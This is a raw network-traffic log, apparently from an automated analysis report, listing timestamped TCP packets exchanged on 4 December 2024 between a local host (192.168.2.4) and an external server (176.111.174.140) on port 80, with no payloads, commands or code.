                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.447534084 CET8049733176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.450644970 CET4973380192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.502516985 CET4973480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.622318029 CET8049734176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.622663021 CET4973480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.638899088 CET4973480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:23.758780003 CET8049734176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.896568060 CET8049730176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.896641016 CET4973080192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.960546970 CET8049734176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.961369991 CET8049734176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.962591887 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.962590933 CET4973480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:24.962637901 CET4973480192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.082488060 CET8049734176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.082501888 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.082683086 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.082915068 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.131455898 CET8049731176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.131629944 CET4973180192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.162938118 CET8049732176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.163136959 CET4973280192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.202816963 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.202950954 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:25.322774887 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.792840958 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.793157101 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.793226004 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.802453041 CET4973580192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.806654930 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.922903061 CET8049735176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.926744938 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.928695917 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:26.932009935 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.052268028 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.053642988 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.174653053 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.630590916 CET8049733176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:27.630647898 CET4973380192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.523123026 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.523401976 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.523542881 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.524908066 CET4973680192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.525496006 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.646486044 CET8049736176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.647258043 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.647437096 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.647669077 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:28.767524004 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999641895 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999684095 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999694109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999726057 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999763966 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999797106 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999799013 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999810934 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999823093 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:29.999849081 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000000000 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000011921 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000026941 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000046968 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.000076056 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.124243975 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.124353886 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.124413967 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.128447056 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.178522110 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.191737890 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.191782951 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.191848040 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.195884943 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.197479010 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.197549105 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.197587013 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.205980062 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.206032038 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.206049919 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.212299109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.212341070 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.212373972 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.220762014 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.220810890 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.220925093 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.229166031 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.229209900 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.229234934 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.237658978 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.237701893 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.237787008 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.245984077 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.246026993 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.246037006 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.254364967 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.254409075 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.254477024 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.262751102 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.262814999 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.262892962 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.306063890 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391832113 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391866922 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391901970 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391911983 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391923904 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391927004 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.391964912 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.511940002 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.511964083 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.512027979 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.512041092 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.512054920 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.512110949 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634403944 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634423018 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634433985 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634444952 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634455919 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634466887 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634476900 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634481907 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634488106 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634505033 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634516001 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634516954 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634529114 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634540081 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634543896 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634550095 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634579897 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634648085 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634659052 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634669065 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634686947 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634697914 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634704113 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634716034 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634721994 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634726048 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634737015 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634747028 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634754896 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634758949 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634769917 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634776115 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634779930 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634790897 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634800911 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634800911 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634814024 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.634834051 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635459900 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635473013 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635509968 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635579109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635621071 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635669947 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635682106 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635693073 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635704994 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635715008 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635725975 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635727882 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635746956 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.635776997 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636095047 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636106968 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636149883 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636720896 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636876106 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.636924982 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.641311884 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.643013954 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.643060923 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.643095970 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.647859097 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.647919893 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.648030996 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.652364969 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.652405977 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.652426004 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.656866074 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.656922102 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.656941891 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.709702015 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.758380890 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.758460045 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.758512020 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.760544062 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.760627031 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.760672092 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.765173912 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.765280962 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.765342951 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.769853115 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.769927025 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.769973040 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.773962021 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.774039030 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.774094105 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.778028011 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.778131008 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.778181076 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.782100916 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.782186985 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.782238960 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.786130905 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.786211967 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.786257029 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.790064096 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.790179968 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.790249109 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.793874979 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.793952942 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.794003010 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.797648907 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.797708988 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.797769070 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.801520109 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.801650047 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.801697016 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.805356979 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.805491924 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.805541039 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.809211969 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.809323072 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.809370041 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.813043118 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.813220978 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.813268900 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.817150116 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.817245960 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.817301035 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.821046114 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.821131945 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.821192980 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.824950933 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.825056076 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.825237989 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.828867912 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.828950882 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.829018116 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.832668066 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.832787037 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.832843065 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.836200953 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.836321115 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.836380959 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.840053082 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.840177059 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.840234041 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.843846083 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.843914032 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.843965054 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.847593069 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.847826958 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.847877979 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.851418018 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.851551056 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.851617098 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.855138063 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.855317116 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.855366945 CET4973780192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.859054089 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.859134912 CET8049737176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:30.859188080 CET4973780192.168.2.4176.111.174.140
